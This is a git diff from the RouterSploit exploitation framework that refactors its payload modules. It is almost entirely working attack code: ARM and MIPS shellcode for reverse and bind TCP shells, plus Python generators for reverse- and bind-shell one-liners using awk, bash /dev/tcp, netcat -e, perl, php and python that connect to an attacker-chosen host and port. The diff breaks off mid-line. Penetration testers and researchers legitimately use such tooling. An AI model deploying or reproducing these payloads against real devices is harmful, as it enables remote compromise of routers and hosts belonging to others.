+ b"\x04\x20\x8d\xe2" + + b"\x0b\x00\x90\xef" ) diff --git a/routersploit/modules/payloads/armle/reverse_tcp.py b/routersploit/modules/payloads/armle/reverse_tcp.py index 4e12bd097..e3e843586 100644 --- a/routersploit/modules/payloads/armle/reverse_tcp.py +++ b/routersploit/modules/payloads/armle/reverse_tcp.py @@ -1,5 +1,5 @@ -from routersploit import validators -from routersploit.payloads import ( +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import ( ArchitectureSpecificPayload, Architectures, ReverseTCPPayloadMixin, @@ -8,38 +8,36 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): __info__ = { - 'name': 'ARMLE Reverse TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ - ], + "name": "ARMLE Reverse TCP", + "description": "Creates interactive tcp reverse shell for ARMLE architecture.", + "authors": ( + "Marcin Bury " # routersploit module + ), } architecture = Architectures.ARMLE def generate(self): - reverse_ip = validators.convert_ip(self.lhost) - reverse_port = validators.convert_port(self.lport) + reverse_ip = utils.convert_ip(self.lhost) + reverse_port = utils.convert_port(self.lport) + return ( - "\x01\x10\x8F\xE2" + - "\x11\xFF\x2F\xE1" + - "\x02\x20\x01\x21" + - "\x92\x1A\x0F\x02" + - "\x19\x37\x01\xDF" + - "\x06\x1C\x08\xA1" + - "\x10\x22\x02\x37" + - "\x01\xDF\x3F\x27" + - "\x02\x21\x30\x1c" + - "\x01\xdf\x01\x39" + - "\xFB\xD5\x05\xA0" + - "\x92\x1a\x05\xb4" + - "\x69\x46\x0b\x27" + - "\x01\xDF\xC0\x46" + - "\x02\x00" + reverse_port + # "\x12\x34" struct sockaddr and port + b"\x01\x10\x8F\xE2" + + b"\x11\xFF\x2F\xE1" + + b"\x02\x20\x01\x21" + + b"\x92\x1A\x0F\x02" + + b"\x19\x37\x01\xDF" + + b"\x06\x1C\x08\xA1" + + b"\x10\x22\x02\x37" + + b"\x01\xDF\x3F\x27" + + b"\x02\x21\x30\x1c" + + b"\x01\xdf\x01\x39" + + b"\xFB\xD5\x05\xA0" + + b"\x92\x1a\x05\xb4" + + b"\x69\x46\x0b\x27" + + b"\x01\xDF\xC0\x46" + + b"\x02\x00" + reverse_port + # "\x12\x34" struct sockaddr and port reverse_ip + # reverse ip address - "\x2f\x62\x69\x6e" + # /bin - "\x2f\x73\x68\x00" # /sh\0 + b"\x2f\x62\x69\x6e" + # /bin + b"\x2f\x73\x68\x00" # /sh\0 ) diff --git a/routersploit/modules/payloads/cmd/__init__.py b/routersploit/modules/payloads/cmd/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/payloads/cmd/awk_bind_tcp.py b/routersploit/modules/payloads/cmd/awk_bind_tcp.py new file mode 100644 index 000000000..f3d1b0328 --- /dev/null +++ b/routersploit/modules/payloads/cmd/awk_bind_tcp.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload + + +class Exploit(BindTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "Awk Bind TCP", + "description": "Creates an interactive tcp bind shell by using (g)awk.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("awk", "Awk binary") + + def generate(self): + return ( + self.cmd + + " 'BEGIN{s=\"/inet/tcp/" + + str(self.rport) + + "/0/0\";for(;s|&getline c;close(c))" + + "while(c|getline)print|&s;close(s)}'" + ) diff --git a/routersploit/modules/payloads/cmd/awk_reverse_tcp.py b/routersploit/modules/payloads/cmd/awk_reverse_tcp.py new file mode 100644 index 000000000..62c5cc50c --- /dev/null +++ b/routersploit/modules/payloads/cmd/awk_reverse_tcp.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin + + +class Exploit(ReverseTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "Awk Reverse TCP", + "description": "Creates an interactive tcp reverse shell by using (g)awk.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("awk", "Awk binary") + + def generate(self): + return ( + self.cmd + + " 'BEGIN{s=\"/inet/tcp/0/" + + "{}/{}".format(self.lhost, self.lport) + + "\";for(;s|&getline c;close(c))" + + "while(c|getline)print|&s;close(s)};'" + ) diff --git a/routersploit/modules/payloads/cmd/bash_reverse_tcp.py b/routersploit/modules/payloads/cmd/bash_reverse_tcp.py new file mode 100644 index 000000000..ddc614d64 --- /dev/null +++ b/routersploit/modules/payloads/cmd/bash_reverse_tcp.py @@ -0,0 +1,17 @@ +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin + + +class Exploit(ReverseTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "Bash Reverse TCP", + "description": "Creates interactive tcp reverse shell by using bash.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("bash", "Bash binary") + + def generate(self): + return "{} -i >& /dev/tcp/{}/{} 0>&1".format(self.cmd, self.lhost, self.lport) diff --git a/routersploit/modules/payloads/cmd/netcat_bind_tcp.py b/routersploit/modules/payloads/cmd/netcat_bind_tcp.py new file mode 100644 index 000000000..6976a0e10 --- /dev/null +++ b/routersploit/modules/payloads/cmd/netcat_bind_tcp.py @@ -0,0 +1,20 @@ +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import BindTCPPayloadMixin, GenericPayload + + +class Exploit(BindTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "Netcat Bind TCP", + "description": "Creates interactive tcp bind shell by using netcat.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("nc", "Netcat binary") + shell_binary = OptString("/bin/sh", "Shell") + + def generate(self): + return "{} -lvp {} -e {}".format(self.cmd, + self.rport, + self.shell_binary) diff --git a/routersploit/modules/payloads/cmd/netcat_reverse_tcp.py b/routersploit/modules/payloads/cmd/netcat_reverse_tcp.py new file mode 100644 index 000000000..d3418c1bd --- /dev/null +++ b/routersploit/modules/payloads/cmd/netcat_reverse_tcp.py @@ -0,0 +1,21 @@ +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin + + +class Exploit(ReverseTCPPayloadMixin, GenericPayload): + __info__ = { + "name": "Netcat Reverse TCP", + "description": "Creates interactive tcp reverse shell by using netcat.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("nc", "Netcat binary") + shell_binary = OptString("/bin/sh", "Shell") + + def generate(self): + return "{} {} {} -e {}".format(self.cmd, + self.lhost, + self.lport, + self.shell_binary) diff --git a/routersploit/modules/payloads/cmd/perl_bind_tcp.py b/routersploit/modules/payloads/cmd/perl_bind_tcp.py new file mode 100644 index 000000000..e1c7126a5 --- /dev/null +++ b/routersploit/modules/payloads/cmd/perl_bind_tcp.py @@ -0,0 +1,20 @@ +from routersploit.core.exploit import * +from routersploit.modules.payloads.perl.bind_tcp import Exploit as PerlBindTCP + + +class Exploit(PerlBindTCP): + __info__ = { + "name": "Perl Bind TCP One-Liner", + "description": "Creates interactive tcp bind shell by using perl one-liner.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("perl", "Perl binary") + + def generate(self): + payload = super(Exploit, self).generate() + + cmd = "{} -MIO -e '{}'".format(self.cmd, payload) + return cmd diff --git a/routersploit/modules/payloads/cmd/perl_reverse_tcp.py b/routersploit/modules/payloads/cmd/perl_reverse_tcp.py new file mode 100644 index 000000000..0c2fa0bd0 --- /dev/null +++ b/routersploit/modules/payloads/cmd/perl_reverse_tcp.py @@ -0,0 +1,20 @@ +from routersploit.core.exploit import * +from routersploit.modules.payloads.perl.reverse_tcp import Exploit as PerlReverseTCP + + +class Exploit(PerlReverseTCP): + __info__ = { + "name": "Perl Reverse TCP One-Liner", + "description": "Creates interactive tcp reverse shell by using perl one-liner.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("perl", "Perl binary") + + def generate(self): + payload = super(Exploit, self).generate() + + cmd = "{} -MIO -e '{}'".format(self.cmd, payload) + return cmd diff --git a/routersploit/modules/payloads/cmd/php_reverse_tcp.py b/routersploit/modules/payloads/cmd/php_reverse_tcp.py new file mode 100644 index 000000000..71375a725 --- /dev/null +++ b/routersploit/modules/payloads/cmd/php_reverse_tcp.py @@ -0,0 +1,20 @@ +from routersploit.core.exploit import * +from routersploit.modules.payloads.php.reverse_tcp import Exploit as PHPReverseTCP + + +class Exploit(PHPReverseTCP): + __info__ = { + "name": "PHP Reverse TCP One-Liner", + "description": "Creates interactive tcp reverse shell by using php one-liner.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("php", "PHP binary") + + def generate(self): + payload = super(Exploit, self).generate() + + cmd = '{} -r "{}"'.format(self.cmd, payload) + return cmd diff --git a/routersploit/modules/payloads/cmd/python_bind_tcp.py b/routersploit/modules/payloads/cmd/python_bind_tcp.py new file mode 100644 index 000000000..c4522ba6e --- /dev/null +++ b/routersploit/modules/payloads/cmd/python_bind_tcp.py @@ -0,0 +1,20 @@ +from routersploit.core.exploit import * +from routersploit.modules.payloads.python.bind_tcp import Exploit as PythonBindTCP + + +class Exploit(PythonBindTCP): + __info__ = { + "name": "Python Reverse TCP One-Liner", + "description": "Creates interactive tcp bind shell by using python one-liner.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("python", "Python binary") + + def generate(self): + payload = super(Exploit, self).generate() + + cmd = '{} -c "{}"'.format(self.cmd, payload) + return cmd diff --git a/routersploit/modules/payloads/cmd/python_reverse_tcp.py b/routersploit/modules/payloads/cmd/python_reverse_tcp.py new file mode 100644 index 000000000..677e19e3d --- /dev/null +++ b/routersploit/modules/payloads/cmd/python_reverse_tcp.py @@ -0,0 +1,20 @@ +from routersploit.core.exploit import * +from routersploit.modules.payloads.python.reverse_tcp import Exploit as PythonReverseTCP + + +class Exploit(PythonReverseTCP): + __info__ = { + "name": "Python Reverse TCP One-Liner", + "description": "Creates interactive tcp reverse shell by using python one-liner.", + "authors": ( + "Marcin Bury " # routersploit module + ), + } + + cmd = OptString("python", "Python binary") + + def generate(self): + payload = super(Exploit, self).generate() + + cmd = '{} -c "{}"'.format(self.cmd, payload) + return cmd diff --git a/routersploit/modules/payloads/generic/awk_bind_tcp.py b/routersploit/modules/payloads/generic/awk_bind_tcp.py deleted file mode 100644 index 8ff9bb3d9..000000000 --- a/routersploit/modules/payloads/generic/awk_bind_tcp.py +++ /dev/null @@ -1,26 +0,0 @@ -from routersploit import exploits -from routersploit.payloads import BindTCPPayloadMixin, GenericPayload - - -class Exploit(BindTCPPayloadMixin, GenericPayload): - __info__ = { - 'name': 'Awk Bind TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ - ], - } - - awk_binary = exploits.Option('awk', 'Awk binary') - - def generate(self): - return ( - self.awk_binary - + " 'BEGIN{s=\"/inet/tcp/" - + str(self.rport) - + "/0/0\";for(;s|&getline c;close(c))" - "while(c|getline)print|&s;close(s)}'" - ) diff --git a/routersploit/modules/payloads/generic/awk_reverse_tcp.py b/routersploit/modules/payloads/generic/awk_reverse_tcp.py deleted file mode 100644 index 7d7baca1a..000000000 --- a/routersploit/modules/payloads/generic/awk_reverse_tcp.py +++ /dev/null @@ -1,26 +0,0 @@ -from routersploit import exploits -from routersploit.payloads import GenericPayload, ReverseTCPPayloadMixin - - -class Exploit(ReverseTCPPayloadMixin, GenericPayload): - __info__ = { - 'name': 'Awk Reverse TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ - ], - } - awk_binary = exploits.Option('awk', 'Awk binary') - - def generate(self): - return ( - self.awk_binary - + " 'BEGIN{s=\"/inet/tcp/0/" - + self.lhost + "/" - + str(self.lport) - + "\";for(;s|&getline c;close(c))" - "while(c|getline)print|&s;close(s)};'" - ) diff --git a/routersploit/modules/payloads/generic/netcat_bind_tcp.py b/routersploit/modules/payloads/generic/netcat_bind_tcp.py deleted file mode 100644 index 5cdd9ad6a..000000000 --- a/routersploit/modules/payloads/generic/netcat_bind_tcp.py +++ /dev/null @@ -1,23 +0,0 @@ -from routersploit import exploits -from routersploit.payloads import BindTCPPayloadMixin, GenericPayload - - -class Exploit(BindTCPPayloadMixin, GenericPayload): - __info__ = { - 'name': 'Netcat Bind TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ - ], - } - - netcat_binary = exploits.Option('/bin/nc', 'Netcat binary') - shell_binary = exploits.Option('/bin/sh', 'Shell') - - def generate(self): - return "{} -lvp {} -e {}".format(self.netcat_binary, - self.rport, - self.shell_binary) diff --git a/routersploit/modules/payloads/generic/netcat_reverse_tcp.py b/routersploit/modules/payloads/generic/netcat_reverse_tcp.py deleted file mode 100644 index fe841a879..000000000 --- a/routersploit/modules/payloads/generic/netcat_reverse_tcp.py +++ /dev/null @@ -1,23 +0,0 @@ -from routersploit import exploits -from routersploit.payloads import GenericPayload, ReverseTCPPayloadMixin - - -class Exploit(ReverseTCPPayloadMixin, GenericPayload): - __info__ = { - 'name': 'Netcat Reverse TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ - ], - } - netcat_binary = exploits.Option('/bin/nc', 'Netcat binary') - shell_binary = exploits.Option('/bin/sh', 'Shell') - - def generate(self): - return "{} {} {} -e {}".format(self.netcat_binary, - self.lhost, - self.lport, - self.shell_binary) diff --git a/routersploit/modules/payloads/mipsbe/bind_tcp.py b/routersploit/modules/payloads/mipsbe/bind_tcp.py index a99792891..0e7b4185f 100644 --- a/routersploit/modules/payloads/mipsbe/bind_tcp.py +++ b/routersploit/modules/payloads/mipsbe/bind_tcp.py @@ -1,5 +1,5 @@ -from routersploit import validators -from routersploit.payloads import ( +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import ( ArchitectureSpecificPayload, Architectures, BindTCPPayloadMixin, @@ -8,90 +8,88 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): __info__ = { - 'name': 'MIPSBE Bind TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ - ], + "name": "MIPSBE Bind TCP", + "description": "Creates interactive tcp bind shell for MIPSBE architecture.", + "authors": ( + "Marcin Bury " # routersploit module + ), } architecture = Architectures.MIPSBE def generate(self): - bind_port = validators.convert_port(self.rport) + bind_port = utils.convert_port(self.rport) + return ( # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 - "\x27\xbd\xff\xe0" + # addiu sp,sp,-32 - "\x24\x0e\xff\xfd" + # li t6,-3 - "\x01\xc0\x20\x27" + # nor a0,t6,zero - "\x01\xc0\x28\x27" + # nor a1,t6,zero - "\x28\x06\xff\xff" + # slti a2,zero,-1 - "\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket ) - "\x01\x01\x01\x0c" + # syscall + b"\x27\xbd\xff\xe0" + # addiu sp,sp,-32 + b"\x24\x0e\xff\xfd" + # li t6,-3 + b"\x01\xc0\x20\x27" + # nor a0,t6,zero + b"\x01\xc0\x28\x27" + # nor a1,t6,zero + b"\x28\x06\xff\xff" + # slti a2,zero,-1 + b"\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket ) + b"\x01\x01\x01\x0c" + # syscall # bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0 - "\x30\x50\xff\xff" + # andi s0,v0,0xffff - "\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef - "\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16) - "\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3 - "\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2 - "\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000 - "\x24\x0e" + bind_port + # li t6,0xFFFF (port) ; t6: 0x115c (4444 (default LPORT)) - "\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c - "\xaf\xad\xff\xe0" + # sw t5,-32(sp) - "\xaf\xa0\xff\xe4" + # sw zero,-28(sp) - "\xaf\xa0\xff\xe8" + # sw zero,-24(sp) - "\xaf\xa0\xff\xec" + # sw zero,-20(sp) - "\x02\x10\x20\x25" + # or a0,s0,s0 - "\x24\x0e\xff\xef" + # li t6,-17 - "\x01\xc0\x30\x27" + # nor a2,t6,zero - "\x23\xa5\xff\xe0" + # addi a1,sp,-32 - "\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A - "\x01\x01\x01\x0c" + # syscall + b"\x30\x50\xff\xff" + # andi s0,v0,0xffff + b"\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef + b"\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16) + b"\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3 + b"\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2 + b"\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000 + b"\x24\x0e" + bind_port + # li t6,0xFFFF (port) ; t6: 0x115c (4444 (default LPORT)) + b"\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c + b"\xaf\xad\xff\xe0" + # sw t5,-32(sp) + b"\xaf\xa0\xff\xe4" + # sw zero,-28(sp) + b"\xaf\xa0\xff\xe8" + # sw zero,-24(sp) + b"\xaf\xa0\xff\xec" + # sw zero,-20(sp) + b"\x02\x10\x20\x25" + # or a0,s0,s0 + b"\x24\x0e\xff\xef" + # li t6,-17 + b"\x01\xc0\x30\x27" + # nor a2,t6,zero + b"\x23\xa5\xff\xe0" + # addi a1,sp,-32 + b"\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A + b"\x01\x01\x01\x0c" + # syscall # listen(3, 257) = 0 - "\x02\x10\x20\x25" + # or a0,s0,s0 - "\x24\x05\x01\x01" + # li a1,257 - "\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen ) - "\x01\x01\x01\x0c" + # syscall + b"\x02\x10\x20\x25" + # or a0,s0,s0 + b"\x24\x05\x01\x01" + # li a1,257 + b"\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen ) + b"\x01\x01\x01\x0c" + # syscall # accept(3, 0, NULL) = 4 - "\x02\x10\x20\x25" + # or a0,s0,s0 - "\x28\x05\xff\xff" + # slti a1,zero,-1 - "\x28\x06\xff\xff" + # slti a2,zero,-1 - "\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept ) - "\x01\x01\x01\x0c" + # syscall + b"\x02\x10\x20\x25" + # or a0,s0,s0 + b"\x28\x05\xff\xff" + # slti a1,zero,-1 + b"\x28\x06\xff\xff" + # slti a2,zero,-1 + b"\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept ) + b"\x01\x01\x01\x0c" + # syscall # dup2(4, 2) = 2 # dup2(4, 1) = 1 # dup2(4, 0) = 0 - "\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket - "\x24\x11\xff\xfd" + # li s1,-3 - "\x02\x20\x88\x27" + # nor s1,s1,zero - "\x8f\xa4\xff\xff" + # lw a0,-1(sp) - "\x02\x20\x28\x21" + # move a1,s1 # dup2_loop - "\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 ) - "\x01\x01\x01\x0c" + # syscall 0x40404 - "\x24\x10\xff\xff" + # li s0,-1 - "\x22\x31\xff\xff" + # addi s1,s1,-1 - "\x16\x30\xff\xfa" + # bne s1,s0 + b"\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket + b"\x24\x11\xff\xfd" + # li s1,-3 + b"\x02\x20\x88\x27" + # nor s1,s1,zero + b"\x8f\xa4\xff\xff" + # lw a0,-1(sp) + b"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop + b"\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 ) + b"\x01\x01\x01\x0c" + # syscall 0x40404 + b"\x24\x10\xff\xff" + # li s0,-1 + b"\x22\x31\xff\xff" + # addi s1,s1,-1 + b"\x16\x30\xff\xfa" + # bne s1,s0 # execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0 - "\x28\x06\xff\xff" + # slti a2,zero,-1 - "\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//" - "\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi" - "\xaf\xaf\xff\xec" + # sw t7,-20(sp) - "\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/" - "\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh" - "\xaf\xae\xff\xf0" + # sw t6,-16(sp) - "\xaf\xa0\xff\xf4" + # sw zero,-12(sp) - "\x27\xa4\xff\xec" + # addiu a0,sp,-20 - "\xaf\xa4\xff\xf8" + # sw a0,-8(sp) - "\xaf\xa0\xff\xfc" + # sw zero,-4(sp) - "\x27\xa5\xff\xf8" + # addiu a1,sp,-8 - "\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve ) - "\x01\x01\x01\x0c" # syscall 0x40404 + b"\x28\x06\xff\xff" + # slti a2,zero,-1 + b"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//" + b"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi" + b"\xaf\xaf\xff\xec" + # sw t7,-20(sp) + b"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/" + b"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh" + b"\xaf\xae\xff\xf0" + # sw t6,-16(sp) + b"\xaf\xa0\xff\xf4" + # sw zero,-12(sp) + b"\x27\xa4\xff\xec" + # addiu a0,sp,-20 + b"\xaf\xa4\xff\xf8" + # sw a0,-8(sp) + b"\xaf\xa0\xff\xfc" + # sw zero,-4(sp) + b"\x27\xa5\xff\xf8" + # addiu a1,sp,-8 + b"\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve ) + b"\x01\x01\x01\x0c" # syscall 0x40404 ) diff --git a/routersploit/modules/payloads/mipsbe/reverse_tcp.py b/routersploit/modules/payloads/mipsbe/reverse_tcp.py index c4c2bcb35..0a8c7fd68 100644 --- a/routersploit/modules/payloads/mipsbe/reverse_tcp.py +++ b/routersploit/modules/payloads/mipsbe/reverse_tcp.py @@ -1,5 +1,5 @@ -from routersploit import validators -from routersploit.payloads import ( +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import ( ArchitectureSpecificPayload, Architectures, ReverseTCPPayloadMixin, @@ -8,69 +8,67 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): __info__ = { - 'name': 'MIPSBE Reverse TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ - ], + "name": "MIPSBE Reverse TCP", + "description": "Creates interactive tcp reverse shell for MIPSBE architecture.", + "authors": ( + "Marcin Bury " # routersploit module + ), } architecture = Architectures.MIPSBE def generate(self): - reverse_ip = validators.convert_ip(self.lhost) - reverse_port = validators.convert_port(self.lport) + reverse_ip = utils.convert_ip(self.lhost) + reverse_port = utils.convert_port(self.lport) + return ( - "\x28\x04\xff\xff" + # slti a0,zero,-1 - "\x24\x02\x0f\xa6" + # li v0,4006 - "\x01\x09\x09\x0c" + # syscall 0x42424 - "\x28\x04\x11\x11" + # slti a0,zero,4369 - "\x24\x02\x0f\xa6" + # li v0,4006 - "\x01\x09\x09\x0c" + # syscall 0x42424 - "\x24\x0c\xff\xfd" + # li t4,-3 - "\x01\x80\x20\x27" + # nor a0,t4,zero - "\x24\x02\x0f\xa6" + # li v0,4006 - "\x01\x09\x09\x0c" + # syscall 0x42424 - "\x24\x0c\xff\xfd" + # li t4,-3 - "\x01\x80\x20\x27" + # nor a0,t4,zero - "\x01\x80\x28\x27" + # nor a1,t4,zero - "\x28\x06\xff\xff" + # slti a2,zero,-1 - "\x24\x02\x10\x57" + # li v0,4183 - "\x01\x09\x09\x0c" + # syscall 0x42424 - "\x30\x44\xff\xff" + # andi a0,v0,0xffff - "\x24\x02\x0f\xc9" + # li v0,4041 - "\x01\x09\x09\x0c" + # syscall 0x42424 - "\x24\x02\x0f\xc9" + # li v0,4041 - "\x01\x09\x09\x0c" + # syscall 0x42424 - "\x3c\x05\x00\x02" + # lui a1,0x2 - "\x34\xa5" + reverse_port + # "\x7a\x69" # ori a1,a1,0x7a69 - "\xaf\xa5\xff\xf8" + # sw a1,-8(sp) - "\x3c\x05" + reverse_ip[:2] + # "\xc0\xa8" # lui a1,0xc0a8 - "\x34\xa5" + reverse_ip[2:] + # "\x01\x37" # ori a1,a1,0x137 - "\xaf\xa5\xff\xfc" + # sw a1,-4(sp) - "\x23\xa5\xff\xf8" + # addi a1,sp,-8 - "\x24\x0c\xff\xef" + # li t4,-17 - "\x01\x80\x30\x27" + # nor a2,t4,zero - "\x24\x02\x10\x4a" + # li v0,4170 - "\x01\x09\x09\x0c" + # syscall 0x42424 - "\x3c\x08\x2f\x2f" + # lui t0,0x2f2f - "\x35\x08\x62\x69" + # ori t0,t0,0x6269 - "\xaf\xa8\xff\xec" + # sw t0,-20(sp) - "\x3c\x08\x6e\x2f" + # lui t0,0x6e2f - "\x35\x08\x73\x68" + # ori t0,t0,0x7368 - "\xaf\xa8\xff\xf0" + # sw t0,-16(sp) - "\x28\x07\xff\xff" + # slti a3,zero,-1 - "\xaf\xa7\xff\xf4" + # sw a3,-12(sp) - "\xaf\xa7\xff\xfc" + # sw a3,-4(sp) - "\x23\xa4\xff\xec" + # addi a0,sp,-20 - "\x23\xa8\xff\xec" + # addi t0,sp,-20 - "\xaf\xa8\xff\xf8" + # sw t0,-8(sp) - "\x23\xa5\xff\xf8" + # addi a1,sp,-8 - "\x27\xbd\xff\xec" + # addiu sp,sp,-20 - "\x28\x06\xff\xff" + # slti a2,zero,-1 - "\x24\x02\x0f\xab" + # li v0,4011 - "\x00\x90\x93\x4c" # syscall 0x2424d + b"\x28\x04\xff\xff" + # slti a0,zero,-1 + b"\x24\x02\x0f\xa6" + # li v0,4006 + b"\x01\x09\x09\x0c" + # syscall 0x42424 + b"\x28\x04\x11\x11" + # slti a0,zero,4369 + b"\x24\x02\x0f\xa6" + # li v0,4006 + b"\x01\x09\x09\x0c" + # syscall 0x42424 + b"\x24\x0c\xff\xfd" + # li t4,-3 + b"\x01\x80\x20\x27" + # nor a0,t4,zero + b"\x24\x02\x0f\xa6" + # li v0,4006 + b"\x01\x09\x09\x0c" + # syscall 0x42424 + b"\x24\x0c\xff\xfd" + # li t4,-3 + b"\x01\x80\x20\x27" + # nor a0,t4,zero + b"\x01\x80\x28\x27" + # nor a1,t4,zero + b"\x28\x06\xff\xff" + # slti a2,zero,-1 + b"\x24\x02\x10\x57" + # li v0,4183 + b"\x01\x09\x09\x0c" + # syscall 0x42424 + b"\x30\x44\xff\xff" + # andi a0,v0,0xffff + b"\x24\x02\x0f\xc9" + # li v0,4041 + b"\x01\x09\x09\x0c" + # syscall 0x42424 + b"\x24\x02\x0f\xc9" + # li v0,4041 + b"\x01\x09\x09\x0c" + # syscall 0x42424 + b"\x3c\x05\x00\x02" + # lui a1,0x2 + b"\x34\xa5" + reverse_port + # "\x7a\x69" # ori a1,a1,0x7a69 + b"\xaf\xa5\xff\xf8" + # sw a1,-8(sp) + b"\x3c\x05" + reverse_ip[:2] + # "\xc0\xa8" # lui a1,0xc0a8 + b"\x34\xa5" + reverse_ip[2:] + # "\x01\x37" # ori a1,a1,0x137 + b"\xaf\xa5\xff\xfc" + # sw a1,-4(sp) + b"\x23\xa5\xff\xf8" + # addi a1,sp,-8 + b"\x24\x0c\xff\xef" + # li t4,-17 + b"\x01\x80\x30\x27" + # nor a2,t4,zero + b"\x24\x02\x10\x4a" + # li v0,4170 + b"\x01\x09\x09\x0c" + # syscall 0x42424 + b"\x3c\x08\x2f\x2f" + # lui t0,0x2f2f + b"\x35\x08\x62\x69" + # ori t0,t0,0x6269 + b"\xaf\xa8\xff\xec" + # sw t0,-20(sp) + b"\x3c\x08\x6e\x2f" + # lui t0,0x6e2f + b"\x35\x08\x73\x68" + # ori t0,t0,0x7368 + b"\xaf\xa8\xff\xf0" + # sw t0,-16(sp) + b"\x28\x07\xff\xff" + # slti a3,zero,-1 + b"\xaf\xa7\xff\xf4" + # sw a3,-12(sp) + b"\xaf\xa7\xff\xfc" + # sw a3,-4(sp) + b"\x23\xa4\xff\xec" + # addi a0,sp,-20 + b"\x23\xa8\xff\xec" + # addi t0,sp,-20 + b"\xaf\xa8\xff\xf8" + # sw t0,-8(sp) + b"\x23\xa5\xff\xf8" + # addi a1,sp,-8 + b"\x27\xbd\xff\xec" + # addiu sp,sp,-20 + b"\x28\x06\xff\xff" + # slti a2,zero,-1 + b"\x24\x02\x0f\xab" + # li v0,4011 + b"\x00\x90\x93\x4c" # syscall 0x2424d ) diff --git a/routersploit/modules/payloads/mipsle/bind_tcp.py b/routersploit/modules/payloads/mipsle/bind_tcp.py index 9b6f8db4b..eee96fbb1 100644 --- a/routersploit/modules/payloads/mipsle/bind_tcp.py +++ b/routersploit/modules/payloads/mipsle/bind_tcp.py @@ -1,5 +1,5 @@ -from routersploit import validators -from routersploit.payloads import ( +from routersploit.core.exploit import * +from routersploit.core.exploit.payloads import ( ArchitectureSpecificPayload, Architectures, BindTCPPayloadMixin, @@ -8,82 +8,80 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): __info__ = { - 'name': 'MIPSLE Bind TCP', - 'authors': [ - ], - 'description': '', - 'references': [ - ], - 'devices': [ - ], + "name": "MIPSLE Bind TCP", + "description": "Creates interactive tcp bind shell for MIPSLE architecture.", + "authors": ( + "Marcin Bury " # routersploit module + ), } architecture = Architectures.MIPSLE def generate(self): - bind_port = validators.convert_port(self.rport) + bind_port = 